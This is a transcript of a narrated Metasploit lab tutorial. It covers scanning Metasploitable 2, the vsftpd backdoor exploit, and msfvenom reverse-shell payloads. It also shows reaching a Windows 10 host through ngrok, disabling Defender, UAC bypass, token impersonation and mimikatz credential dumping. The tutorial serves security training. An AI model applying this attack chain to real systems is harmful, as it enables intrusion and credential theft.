Welcome. In this video, I'll be demonstrating Metasploit Framework Console as well as msfvenom. So this is my portfolio, which is passioncoder5.github.io slash portfolio. And let's click on the first project and let's click on Metasploit. So the link of this I'll provide in the description. So when we visit this HTTP write-ups, so you have Metasploit framework documentation, and just click on that. So I have documented each and every step which I'll perform today in this documentation. So the table of contents looks like this, and it consists of msfconsole and module types, finding and reading modules, auxiliary modules and scanners, options set, setg and unset, payload theory, bind versus reverse shell, msfvenom to create payloads, exploiting Metasploitable 2, exploiting Windows 10 with foothold, and ngrok for bypassing NAT networks, and post-exploitation modules. So now let's jump into this MSF console and module types. So Metasploit isn't a tool, it's a framework built entirely out of modules. Everything it does is one of these four types, which is auxiliary, exploit, payload, and post. So auxiliary doesn't exploit a particular target, it is used for gathering data as well as administrative tasks like scanning and fuzzing. Exploit leverages a specific vulnerability to let the framework run arbitrary code on the target. And the payload is the arbitrary code that actually runs on the target once an exploit succeeds. Opening a shell and creating a user, etc., is performed by payload. And post exploitation is it runs after you already have a session, which is either a meterpreter session or a bind session. So gathering data and escalating privileges is done by post. And these were the modules, and let's start from the beginning. So let's type msf console. So I have my Oracle VirtualBox running as well as Metasploitable 2. Let me log into Metasploitable 2 as msf admin and password as msf admin. msf admin. Yeah, we're logged in. Now let's start up our msf console or Metasploit Framework Console. So just type in msf console or sudo msf console to run it with higher root privileges. So type in my Kali password, and this should be starting the Metasploit Framework Console, and we'll get a banner. So this banner explains the number of exploits, auxiliaries, payloads, as well as post modules. And we also have evasion and encoders. We now jump to the next part, which is finding and reading modules. We use a command called search. So let's do search and type as auxiliary. And we give the name of our module which we want to search, which is http html title tag. And one of the module has been matched and it's displayed. So in the description there is http html title tag. That is why there was a match for this module. Now to use this module, let's type use space the module name, and use space the module name, or use 0 will particularly use this module, and the prompt, just uh, observe that the prompt updates to show which module is active. That's your context indicator, and always glance at that before you run. So let's type info and we'll get the documentation uh, to read. So it generates a GET request to the provided web servers and returns the server header, HTML, title, attribute, and location header if set. So these are the basic options, also known as the data store options. So required is the one which we need to set it compulsorily. We cannot run it without the required options, data store options set. And we have to set our host, and the rest we can let it as default. So to set an option, so if it is required as no, we can just leave it as blank or default. If it's required yes, then we can set it as a value which we need. So this generally gives the name and the module name of the particular a particular auxiliary or particular module which we are running or which is in use. So now to set options, we can use the command set. So yeah, let's open up another tab and let's do IPA. Let's just first find the IP address of Metasploitable 2. Let's copy this subnet and let's do nmap-sn for no for not scanning the ports and just the host discovery. So we don't find the particular IP address of the Metasploitable 2. So we have to, I guess we have to restart the Metasploitable 2. Let's just close this particular server and let's power off the machine. Let's change the network settings from NAT network to, let's go to settings first, right click and settings. Let's go to network and we have it bridge adapter and we set the promiscuous mode to allow all. And let's start the virtual machine again. So the machine is booting up. And let's do sudo ufwo allow to allow the port. So we require some of the ports for port scanning. So that is why I'm allowing the ports. And let's do nmap the same subnet again, and we find the IP address of the Oracle VirtualBox virtual network interface card, which is indeed our Metasploitable 2 machine. So 172.20.10.3 is the IP address. So now we are jumping into MSF console and we're searching for an auxiliary module. So auxiliary modules are where reconnaissance happens. Scanners are the biggest subcategory. Port scanners, service version scanners, login brute forces. They never touch a payload. They just gather information. So let's use this particular scanner, which is port scan slash TCP. And let's do options to view the data store options. So these are all set as default. So let's set the ports to scan because we know the ports already. So we can set the ports which we know that are open. So generally you will run it against all the 65,535 ports, but here we set the ports as these particular ports, and let's set the R host, which is our target host, as 172.20.10.3, which is the IP address of Metasploitable 2. And let's type run and hit enter. Let's do show options again. We can do options or show options. It's just an alias. Options is just an alias to that. So we can see that all these options are set. So to set an option, you just need to type set, the option name as well as the value. Now let's do show advanced. So it will show the advanced options. So every module exposes a standard options table with show options and a deeper table called show advanced, timeouts, SSL ciphers, preferences, and verbose logging are displayed in this. And most beginners just never look here, and it's usually where some of the flaky modules get fixed. Let's hit run and we can see that all these TCP ports are open. I don't find port 4445 open. And let's do sudo ufw. Let's change our firewall configuration and let's allow port 4445, which is SMB. That's the standard port number for SMB. And let's do allow outgoing as well. And now let's hit run again. So now you find the port 4445 also open. So to do port scan, you just if there is a firewall, it will restrict you to scan the target network. Now we can do SMB scanner as well. So we use scanner auxiliary scanner for SMB version. So let's do search SMB underscore version, and let's do use 0 to select that particular module, and let's do options and let's set our host as 172.20.10.3. And let's set the R port. R port is not necessary. Let's hit run. So SMB version is detected, which is version 1. Let's hit run again, and SMB version is detected, which is version 1. And signature optional, host is running Unix, and SMB signing is not required. So this is the information we get when we run SMB version module. And so this was all about the scanner module in auxiliary scanner modules in particular MSF console. So we see this set options, right? So let's go to HTTP title scanner again, and let's do options. Let's do set our host. So set our host, and we can give the domain name of google.com. So it sets for current module only. Uh, one of scan against a single module. So we can use set G option, which is for global persisting. So the option will be set for as a global option, and it will be set as a global value, and uh, we can use it because the L host doesn't change. We can do unset option to uh, unset uh, all the single option, or we can do unset all to unset every option in the current module. So we can start fresh with that. So set and unset are the options to particularly give value to the data store option, as well as to remove those values. So we have not seen set G L host as 172.20.10.2. So this will particularly set a global option, and you rarely see an attacker IP change. So we can set it once. So if we do search exploit slash multi slash handler, let's do search exploit slash multi slash handler. So this is the TCP handler which you start. Let's do use for, and let's do options. So I had set the options in that previous module, so it has persisted to this module as well. So we can do unset all, and uh, because we have set it as a global option, so that will be set. So now let's jump to payload theory, which is bind versus reverse shell. So a payload is the code that runs after an exploit succeeds. So payload comes in three shapes, which is singles, stagers, as well as stages. So singles is fully self-contained. Small is first stage. Uh, Small first stage payloads that establish the connection is called stagers, and stages is the large second part payload that the stager downloads, like meterpreter. So we can see bind shell as well as reverse shell. So this is our attacker IP, and this is our target machine. And target listens on target listens on a particular port. So bind shell opens a port on the target, and attacker initiates connection. It fails due to firewall, but if there is a firewall which is misconfigured, so the attacker connects directly, and the attacker executes command, and the command's output is displayed back from the target on the attacker machine. So it is inbound connection. It is usually blocked by firewalls. So now let's come to reverse shell. So the target connects outbound, which means there is a connect back. So the attacker listens on a particular port. So the attacker starts a listener on their machine. So there is listener port which is 80 and as well as 443. Target initiates the connections. That means it can bypass the firewall, and exploit triggers leads to an outbound connection, and attacker gives the command, connection will be established, and the attacker now can interact with the target shell. So it is an outbound connection, which means bypassing inbound firewalls is possible in this. So these are the differences. You can just check between uh, bind shell as well as reverse shell. In bind shell, the attacker connects to the target, and reverse shell, the target connects back to the attacker. So bind shell is best when target has no firewall or NAT in the way. So reverse shell is best when target is behind a firewall or NAT. And the downside is it is broken. The downside of bind shell is that it is broken by almost any modern firewall or router. So the downside of reverse shell is attackers local host and local port must be reachable. It is solved with ngrok. Later in this video I'll be explaining how to uh, make the L host as well as L port reachable to the from our NAT network by bypassing our NAT network. So let's go to the next one, next concept, which is msfvenom. So msfvenom replaced the old msf payload as well as msf encode. So these are the options, as well as the dash L for listing all modules types, and dash P is for specifying the payloads, dash F is for the output format, dash E is for encoder, dash A is for architecture, which is x86 or x64, and dash O to specify the out file, and dash B for bad characters, the characters to avoid, and dash I for iterations, and dash X is for specifying the templates, so the custom executable file which will be used. And so these are the particular options of msfvenom. So msfvenom is used to generate payloads. So let's do msfvenom dash L payloads to list the payloads. And we find these many payloads which are there in particularly msfvenom. So these many kinds of payloads, it's around 1154, I guess. Not sure about the number. Yeah, it's 1446. Yeah. So we can do msfvenom double dash list formats. And we see the formats of the particular payloads which can be generated using msfvenom. So we can see that ASP, ASPX, ASPX EXE, EXE only, EXE only for x64, as whereas EXE for x86. We can see var, we can see jar files, and we can see all this msfvenom payloads. So now let's do msfvenom dash p Windows x64 meterpreter. Let's do x86 itself. Let's do Windows meterpreter reverse TCP. So let's do msfvenom-p. So this was the previous command which I had run. Let's just clear out this and let's specify nothing, just the payload. So Windows x64 meterpreter reverse TCP. So this just gives the binary content. So Windows is for platform, x64 is for architecture, meterpreter is the stages, and reverse TCP is the stager. So we can also specify the stages such as reverse HTTPS, HTTP, reverse HTTP, and we can specify it for x86 as well. Now let's specify lhost. So lhost is equal to 172.20.10.2, and let's specify the L port as 4444. So you need a callback IP as well as port, where you specify particularly a listener, and dash F for format of exe, and dash O for output format. So what I was saying is you need a local host and local port callback, the payload callbacks to this particular local host and local port, so that we are configuring using lhost and lport. So our payload has been saved to /temp folder, and it is saved as payload.exe. So that was how to generate using msfvenom. Now we can give encoding, which will specify or remove the bad characters. So why we need to remove the bad characters is we need to particularly um, we need to remove bad characters because the particular communication mechanism is not to be interrupted. So bad characters are just like bad characters are just like a null character which terminates the string. It's the same way we don't want our payload to be terminated, the communication mechanism to be terminated. So we specify the encoding as x86 Shikata Ganai. This is the particular encoding mechanism. So we had just typed it, given the option as n-e. So let's specify -e and give the encoding. So now the encoded payload will be particularly generated. So so this is not an antivirus evasion technique. It just reshapes the payload's byte signature, so and avoids the bad characters that would essentially break the exploit delivery chain channel. And so we can also specify the bad characters, so -b and x00. So this will automatically select an encoding type and encode the payload and change the payload's byte signature. So it automatically selected that Shikata's encoding, and it had one or two iterations, and it regenerated the payload. It reshaped the payload's byte signature and saved it as payload.exe. So this is how to use bad characters as well as encoding. So now let's either generate another msfvenom payload. For x64, we can specify as Windows/x64, or let's move on to our exploit module of demonstration of exploit module, where we will demonstrate particularly exploiting Metasploit 2, or let's just generate another payload. So this is another way of generating encoding it multiple times, so that the payload signature is essentially reordered, and uh, the payload byte signature is reshaped. So it's just another encoding type where we have given certain iterations like 5, 8, 9, and we have given the format as raw, and finally we have given the format as exe, and we are doing multi-layer encoding, and we have specified the architecture as x86, so that is 32-bit, and platform as Windows. So it's encoding multiple number of times and regenerating the payload and reshaping the payload's signature and saving it as payload.exe. Now we can go to our exploit module. So first let's run an nmap scan of a service scan on ports 21, 22, 23, 53, 80, as well as 4445. And let's do -sv option for enumerating the service versions. Let's do -ss for syn scan or stealth scan. And let's do 172.20.10.3. And so the command is nmap -p to specify the ports, and we specify the open ports, and -sv to specify we need a service version scanning, and -ss to specify that it's a syn scan or a TCP syn scan, and stealth scan, and we specify the target. So we get a number of ports as well, open ports as well as their service and versions. So now let's do searchploit. So searchploit essentially searches for any exploit DB as well as Metasploit exploits, and there we have. Here we have a backdoor command execution Metasploit exploit, and so let's search it in msfconsole as well. Let's go to msfconsole and let's search for this particular VSFTPD version, and let's remove the single quote, and we get this exploit, which is the same exploit which we got in searchploit. Let's do use 0, and this particular exploit will be loaded. So this exploit module loads just the way auxiliary module loads, and let's do options, and we just need to set the rhost. So let's do set rhost as 172.20.10.2. With rhost option you can also give a subnet, a particular subnet. So it was 172.20.10.3, so just make sure you're giving the correct IP, and let's do show targets. So to view the targets, here we have only one target, which is Linux or Unix command. So let's do set target 0, and let's hit run, or we can also specify exploit. It will work the same way. And the target appears to be vulnerable, which is the VSFTPD 2.3.4 version. And we should be getting a shell. So unable to connect backdoor on 6200 TCP. So I guess we need to allow firewall rules on port 6200. So we have to think why is this happening, because either we didn't uh, port allow incoming or outgoing connection for the port 6200. So let's do sudo ufw allow outgoing as 6200 and let's hit enter. Let me type in my Kali password and let's do it for incoming connections as well. And rule is updated, and let's do options, and we have our L host and L port. So we need to uh, allow port 4444 as well as port 8080. I mean, we can allow it and we can run it again. So let's change our firewall rules to allow port 4444 as well as 8080. And let's hit exploit again, and we get an error and set force exploit as true. It says backdoor port is already open, and to override it is listening. The listener port is already open, so to override it, run this particular command. So let's run this and let's exploit again. And backdoor has been spawned, and we get a meter precision. Let's do get UID, and we get the user ID, which is root, and we can do get PID to get the process ID, which is running the meter session. And let's do shell, and we can do who am I, host name, and we get metasploitable IPA to get the IPv4 as well as IPv6 address, as well as the subnet mask. And let's do exit, and we get the meter session. Let's background this session using the background command. And let's close this metasploitable 2. That will essentially close this meter session. Now we are moving into Windows 10 foothold, where I will demonstrate how to get initial foothold on Windows 10 machine, and we'll solve the problem, which is when your reverse shell needs the target to reach your local host and local port. If you are behind a home routers doing SNAT, which is or your lab machine, which is doing a NAT-D network, which is network address translation network, and how do you essentially port forward that particular thing using the ngrok command. We can port forward the TCP connections for the local host 4444, and we also do the port forwarding for localhost 1234 as well. So you can see that this is the global ngrok domain name, and Using the dig command, we can get its particular corresponding IP address. So 3.6.231.193 is our particular IP address. And let's start the Windows machine. So our Windows machine should be starting any moment. So Windows 10 is booting up, and we have this particular port forwarding using ngrok for 4444 as well as 1234 ports. And I have generated a payload for x64 Windows 10 machine. So msfvenom -p for Windows x64 meter-predator reverse TCP, and we specify the lhost which we got using the dig command. So we copy this lhost and we specify the lhost of this particular domain name, and we copy this particular domain name and we do a dig command again. So we get this particular IP address and we specify it in the lhost, and for L port we go back to this port forwarding of 4444 and copy that port as well, and we do -f for format, and we specify exe-only for x64 payloads, and we save it in /temp/payload.exe, and we go to temp folder and start our HTTP server. And let's go to this particular machine. So I have transferred payload.exe. Let's try to delete it. Yes. And let's open up PowerShell. So an administrator PowerShell, run as administrator, and so let's go to PowerShell and run as administrator. You'll get a UAC, which is user access control prompt, and click on yes on that prompt, and let's open this text file. So we have some commands to bypass antivirus. I mean, to disable particular antivirus as well as to disable the firewall rules. So let's wait for some time. Let me do this full screen. And we're waiting for the command line to appear. So this is the PowerShell command line interface. It's a bit slow, so you can try restarting PowerShell. Let's just close this, and let's search for PowerShell, and let's click on run as administrator. Let's give yes to the prompt. And uh, we got a PowerShell and PowerShell terminal, and let's disable virus and threat protection as well as antivirus EDR solutions. And let's disable the firewall rules as well. Let's copy this. So it is setnet. It's a setnet firewall profile hyphen profile domain public and private enabled as false. So you get a prompt that virus and threat protection is off. Please switch it on. And now we can do invoke web request and download our payload. Let's do IWR hyphen URI http colon double slash 172.20.10.2 port 80 slash payload.exe, the name of the particular file which is hosted on the HTTP server, and let's do dash out file, and let's specify c colon slash users, and we get all users. We need to go back, delete the single quotes, and let's do my name, and let's do desktop, and let's save it as payload.exe, and let's hit enter. And the particular file will be downloaded. I guess there is something wrong with the firewall that is not allowing us to connect to port 80. So yeah, let's see the error. The particular error says unable to connect to the remote server, and that is a connection error. So we had previously used invoke web request, and it was not able to connect to the remote server. So now we can enable our firewall to allow port 80's incoming connections. So let's do sudo ufw allow port 80. So ufw is uncomplicated firewall, and allow outgoing as well. So if we are connecting to some requests on port 80, so we have to allow outgoing. But if we are connecting, if something is getting connected to us on port 80, like we are running a service, we have to do allow 80. And now let's start the HTTP server, and let's rerun the command, and we get the payload.exe. Now we have to set up a multi-handler or TCP handler. So let's go to msfconsole, and let's do use exploit slash multi slash handler, which will start a reverse TCP handler on the specified IP and port. We have to specify the lhost and lport, which was specified in the msfvenom payload generation. So let's do options. So we got lhost and lport. It's a little bit different because we have done some port forwarding. Usually it is lhost and lport of your if config as well as the port which you have specified during payload generation. So let's do lport as the ngrox, sorry, lhost as ngrox host IP address, and let's do lport as the port forwarded, the port which was used for port forwarding. So this is the particular port. Let's copy this. And let's go back to that MSF console, and let's paste it. Now we need to set two more options, which is reverse listener bind address as well as reverse listener bind port, just type reverse and double tab. So when you click on tab, it will try to autocomplete, and you'll be displayed with the number of options, and select the option which you need to set. So it is reverse listener bind address, and paste it, and let's set it to our localhost IP address, and let's hit enter, and let's go to reverse listener bind port, and let's set it as 4444. So this is the actual handler which will be started on localhost 4444, and once that is started, it will be port forwarded to the particular public address which is given by ngrok, and that is how we will receive a connection. So when we do show options, we can see all the options set. So let's hit run, and we should see a reverse TCP handler which is starting on a localhost and port 4444. Let's wait for some time because the connection is a little bit slow. Yes, the reverse TCP handler is started on localhost 4444. And now let's right click this and click on open. Or we can even double click the payload. Oh, we have set our payload as shell. I think it's shell Unix. So we have set the wrong payload. So let's terminate this, and let's do Control C to terminate, and let's set the correct payload. So set payload as Windows Meet x64 meterpreter reverse TCP. Windows x64 meterpreter reverse TCP. So that is our payload. And now let's hit run again. I think this time we'll be able to catch a reverse shell. Let's go to this Windows machine, and we have to see that particular command which is started reverse TCP handler on localhost 4444. So the connection is a bit slow. So essentially we have port forwarded to 2 ports, and there you go. Sending stage this many number of bytes to localhost, and meterpreter session, we should get a meterpreter session in just a second, and the connection is a little bit slow. So let's close this 1 2 3 4 port. Let's keep 4444, and we get a meterpreter session back. So session 4 is open. Now we can do get UID to get the user ID. So it says Windows / my name, get PID to get the current process ID of the meterpreter payload, get privs to get the privileges. So we can observe that we are a low privileged user on Windows 10. So we need to escalate our privileges to administrator in order to get higher privileges. Let's background this session, and we will go to something known as local exploit suggester. So it will search for local exploit suggester. It will essentially suggest local exploits so that we can not local exploits. It will suggest some of the exploits so that we can gain higher privileges and maintain persistence. So let's do options, and let's do set session as what was that, session 3, and let's do set session 3, and let's hit run. This will take a little bit of time. I'll be back when this will be completed. So I'm back, and local exploit suggester has completed running, and these are the potential vulnerabilities which are exist for Windows 10 client. And we can use bypass UAC for helper. We can use this bypass UAC exploit as well. So let's use this exploit. Let's copy this, and let's run ngrok for port forwarding of 1122 port. So let's copy this host name, and let's use this exploit. Let's use this particular exploit, and that will be loaded. And let's do options to view the data store options, and let's set session as 2. So just this is a fresh session which I'm performing privilege escalation on. So let's set L port as this particular L port, which is 11979, and let's paste this, and let's set L host as let's get this domain name, and let's do dig command. So let's do dig space dig plus short space this and paste this particular domain, and we'll get an IP address. So let's set the host as that, and let's set reverse listener bind address as localhost, which is 127.0.0.1, and let's set reverse listener bind port as 1122. And let's hit run. So it essentially starts the reverse TCP handler on this local host and local port, and bypass UAC can bypass this setting. So it is sending stages of payloads to back, and it's giving a connect back to uh, our local host IP as well as port 1122. So that is what's happening in the background, and we should get a meter per session in just a moment. And so now let's wait for some time. So we got a meter per session back. So session 4 is open, and we get a higher privileged meter per session. We do get UID, get PID. So it doesn't show administrator, but when we do get privs, we get a lot of privileges, including SE impersonate privileges. We'll see why that's important in a while. So let's do load incognito. And let's do load kiwi to load mimikatz module. Now what we can do is with incognito loaded, as well as with these plugins loaded, let's do list underscore tokens hyphen u to list all the tokens which are available. And we can do impersonate underscore token and provide anti-authority system as to impersonate the token of anti-authority system. So that is basically administrator access. And let's do get UID, and we get it as anti-authority system. And let's do creds underscore all, and we should be getting the NTLM hash SHA-1 hash. So I'll be removing this Windows 10 machine. So if you try to connect to me, I think you will get an error. And so we dumped all the credentials. We actually we impersonated the token of anti-authority system, and we do shell, we get the shell. Let's do who am I, and we get it as anti-authority system. Let's do ipconfig slash all to view the IP address as well as the IP configurations. And we can do system info. I think sysinfo will give you an error, so let's do system info. And we should be getting the system info in a while. So thanks for watching till now. Please like and subscribe to the channel, and do watch my red team operations or ethical hacking videos on RedSecOps. And thank you.